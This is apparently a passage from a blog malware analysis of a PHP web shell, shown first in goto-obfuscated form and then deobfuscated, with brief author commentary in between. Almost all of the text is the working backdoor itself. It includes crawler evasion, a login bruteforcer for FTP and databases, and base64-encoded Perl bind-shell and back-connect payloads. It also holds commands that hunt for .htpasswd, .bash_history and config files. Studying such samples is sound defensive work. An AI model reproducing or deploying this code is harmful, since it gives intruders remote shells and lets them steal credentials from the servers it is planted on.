(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto d98af; F64c6: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto ccfb3; ccfb3: @ini_set('error_log', NULL); goto a3122; fdce9: function actionBruteforce() { goto b1535; a75e4: echo '</div><br>'; goto Dd72e; Dd72e: FkLptFooter(); goto eda09; b1535: FkLptHeader(); goto Ba4be; D2779: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto a75e4; Ba4be: if (isset($_POST['proto'])) { goto A26ae; F43bb: $attempts = 0; goto cff39; cff39: $server = explode(":", $_POST['server']); goto cbf66; A82e2: $success = 0; goto F43bb; ded59: if ($_POST['proto'] == 'ftp') { function FkLptBruteForce($ip, $port, $login, $pass) { goto f44b1; c72f6: if (!$fp) { return false; } goto ced57; a9468: @ftp_close($fp); goto e1553; ced57: $res = @ftp_login($fp, $login, $pass); goto a9468; e1553: return $res; goto aaf2b; f44b1: $fp = @ftp_connect($ip, $port ? $port : 21); goto c72f6; aaf2b: } } elseif ($_POST['proto'] == 'mysql') { function FkLptBruteForce($ip, $port, $login, $pass) { goto D3c0a; d5aef: @mysql_close($res); goto b6972; D3c0a: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto d5aef; b6972: return $res; goto F33d4; F33d4: } } elseif ($_POST['proto'] == 'pgsql') { function FkLptBruteForce($ip, $port, $login, $pass) { goto bf3b5; Fb049: @pg_close($res); goto ddb7b; bf3b5: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto c18c9; c18c9: $res = @pg_connect($str); goto Fb049; ddb7b: return $res; goto fc672; fc672: } } goto A82e2; A26ae: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto ded59; F47e2: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto Bf962; cbf66: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto Ab594; A0fba: if (FkLptBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto B1673; Ab594: $line = explode(":", $line); goto A80eb; b6b15: d1c63: goto Cce00; A80eb: ++$attempts; goto A0fba; B1673: if (@$_POST['reverse']) { goto b3f85; a81ac: if (FkLptBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto C8479; B3191: f5750: goto C4fb7; b3f85: $tmp = ""; goto dd7dd; dd7dd: $i = strlen($line[0]) - 1; goto B5e27; B5e27: e0fc2: goto b7676; C4fb7: --$i; goto Ae5b3; f0d25: bbbd4: goto f5e29; Ae5b3: goto e0fc2; goto f0d25; b7676: if (!($i >= 0)) { goto bbbd4; } goto D097c; f5e29: ++$attempts; goto a81ac; D097c: $tmp .= $line[0][$i]; goto B3191; C8479: } goto b6b15; Cce00: } B7415: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto E5871; b5f28: ++$attempts; goto D5f2f; D5f2f: if (FkLptBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto d4d74; E5871: $line = trim($line); goto b5f28; d4d74: cedad: goto dd437; dd437: } F946e: } } goto F47e2; Bf962: } goto D2779; eda09: } goto dd63f; F16f6: function actionStringTools() { goto Fa295; Fa295: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto B70ac; bc53f: FkLptFooter(); goto E97dd; a5f9b: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto E1f9d; C31b4: return strtoupper($r); goto F592a; E6485: F9485: goto d1428; E1f9d: $r = ''; goto Da14f; Da14f: $i = 0; goto E6485; F6e4d: Df7bf: goto c57c7; d1428: if (!($i < strlen($p))) { goto D47fb; } goto B2833; Df136: D47fb: goto C31b4; c57c7: ++$i; goto B9db4; B2833: $r .= sprintf('%02X', ord($p[$i])); goto F6e4d; B9db4: goto F9485; goto Df136; F592a: } } goto e7842; e7842: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto c1eb7; c1eb7: $r = ''; goto fd634; cdb41: Cf13b: goto A2953; Ea7a7: return strtoupper($r); goto B97c3; A2953: if (!($i < strlen($p))) { goto A5399; } goto F2a85; F2a85: $r .= '%' . dechex(ord($p[$i])); goto bb43b; Ba91b: A5399: goto Ea7a7; A43b6: goto Cf13b; goto Ba91b; fd634: $i = 0; goto cdb41; F97b3: ++$i; goto A43b6; bb43b: C8979: goto F97b3; B97c3: } } goto Dc011; B70ac: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto Ffb2b; Ffb2b: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto f9027; B0fff: Aa837: goto fa386; fa386: if (!($i < strLen($p))) { goto fa6cc; } goto e01b0; aaecc: $i += 2; goto d0c66; d0c66: goto Aa837; goto fc2d2; f9027: $r = ''; goto C8aef; e9a4a: cca0b: goto aaecc; C8aef: $i = 0; goto B0fff; e01b0: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto e9a4a; ebde2: return $r; goto fbf0a; fc2d2: fa6cc: goto ebde2; fbf0a: } } goto a5f9b; ecb21: if (@$_POST['p3']) { FkLptRecursiveGlob($_POST['c']); } goto F758c; Dc011: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto E4b3a; d095c: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto a7d40; Dfe40: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto aa5d6; Ca21f: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto Dfe40; f854c: E46ad: goto Ca21f; aa5d6: echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"; goto E1a76; a7d40: FkLptHeader(); goto dfc86; E258e: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; C0827: } goto f854c; E4b3a: if (isset($_POST['ajax'])) { goto efe94; fb44a: exit; goto C14f7; efe94: FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto be2b3; Bc4b9: echo strlen($temp), "\n", $temp; goto fb44a; B5d64: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto Bc4b9; f564b: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto B5d64; be2b3: ob_start(); goto f564b; C14f7: } goto d095c; dfc86: echo '<h1>String conversions</h1><div class=content>'; goto fca6e; E1a76: function FkLptRecursiveGlob($path) { goto dbcf3; Da50e: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { FkLptRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } A2883: } b7fda: } goto ed8ca; dbcf3: if (substr($path, -1) != '/') { $path .= '/'; } goto F74ca; F74ca: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto Da50e; ed8ca: } goto ecb21; fca6e: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto E258e; F758c: echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>"; goto bc53f; E97dd: } goto ef653; ec1d4: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto Fb269; cd85a: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto B605a; Ef16d: function FkLptWhich($p) { goto E1e7f; E1e7f: $path = FkLptEx('which ' . $p); goto D5091; D5091: if (!empty($path)) { return $path; } goto D079b; D079b: return false; goto Fa448; Fa448: } goto a7e14; D2c3d: function FkLptViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto fa056; Eeced: $color = "#df5"; goto E4fd4; F0f4b: function actionNetwork() { goto b2780; dd5f0: if (isset($_POST['p1'])) { goto E22db; E22db: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto F45d9; F45d9: if ($_POST['p1'] == 'bpp') { goto B1161; d300f: sleep(1); goto dc110; B1161: cf("/tmp/bp.pl", $bind_port_p); goto C77dd; C77dd: $out = FkLptEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto d300f; e8671: unlink("/tmp/bp.pl"); goto F146e; dc110: echo "<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bp.pl") . "</pre>"; goto e8671; F146e: } goto e4cbd; e4cbd: if ($_POST['p1'] == 'bcp') { goto f119d; D5b72: echo "<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bc.pl") . "</pre>"; goto C28b0; E20cb: $out = FkLptEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto E609c; f119d: cf("/tmp/bc.pl", $back_connect_p); goto E20cb; E609c: sleep(1); goto D5b72; C28b0: unlink("/tmp/bc.pl"); goto d5966; d5966: } goto e739e; e739e: } goto bcdaa; Eca80: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto Ae83d; c172c: FkLptFooter(); goto Caa61; b2780: FkLptHeader(); goto Eca80; d8ba6: echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"; goto dd5f0; bcdaa: echo '</div>'; goto c172c; Ae83d: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto d8ba6; Caa61: } goto a23df; D39c7: function FkLptScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto Aa77d; ea530: if (!(false !== ($filename = readdir($dh)))) { goto b41d3; } goto Ab841; bfd90: goto Fbe52; goto e4d2d; Aa77d: $dh = opendir($dir); goto Fc9f5; A6496: return $files; goto fc94f; Fc9f5: Fbe52: goto ea530; e4d2d: b41d3: goto A6496; Ab841: $files[] = $filename; goto bfd90; fc94f: } } goto Ef16d; fbe90: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto b8f60; D0ce4: $disable_functions = @ini_get('disable_functions'); goto D34cc; Cca3c: function FkLptPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . FkLptPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . FkLptPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . FkLptPerms(@fileperms($f)) . '</font>'; } } goto D39c7; a3122: @ini_set('log_errors', 0); goto D5d07; Ce30b: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto c9ec8; b31e6: exit;
Now we’re getting somewhere! So colourful, so pretty. Lot of commands and HTML code. Looks like a backdoor with a web interface. To make it easier to visually look through, I replaced ; with ;\n, so it’s not one massive block of text. There were a lot of goto commands, which purely helps to confuse everything.
PHP Deobfuscator
Fortunately, simon816’s PHP Deobfuscator tool seems to handle these pretty well. Not perfect, but definitely better than before!
I’m not going to go through all 1500+ lines below to determine every aspect of the tool and how exactly it works - I neither have the need, nor the PHP ability! However, it’s deobfuscated enough that we can work out what the script does overall and its primary functions. I consider this a success!
This one is long…
<?php
error_reporting(0);
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if (get_magic_quotes_gpc()) {
function FkLptstripslashes($array)
{
return is_array($array) ? array_map('FkLptstripslashes', $array) : stripslashes($array);
}
$_POST = FkLptstripslashes($_POST);
$_COOKIE = FkLptstripslashes($_COOKIE);
}
function FkLptLogin()
{
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function FkLptsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
FkLptLogin();
}
}
if (strtolower("PHP") == "win") {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax;
}
if ($os == 'win') {
$aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
} else {
$aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
}
function FkLptHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['default_charset'];
}
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; \r\ncharset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; \r\nfont: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = '';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
$i = 0;
c2d57:
if (!($i < $n - 1)) {
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) {
$opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
}
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
}
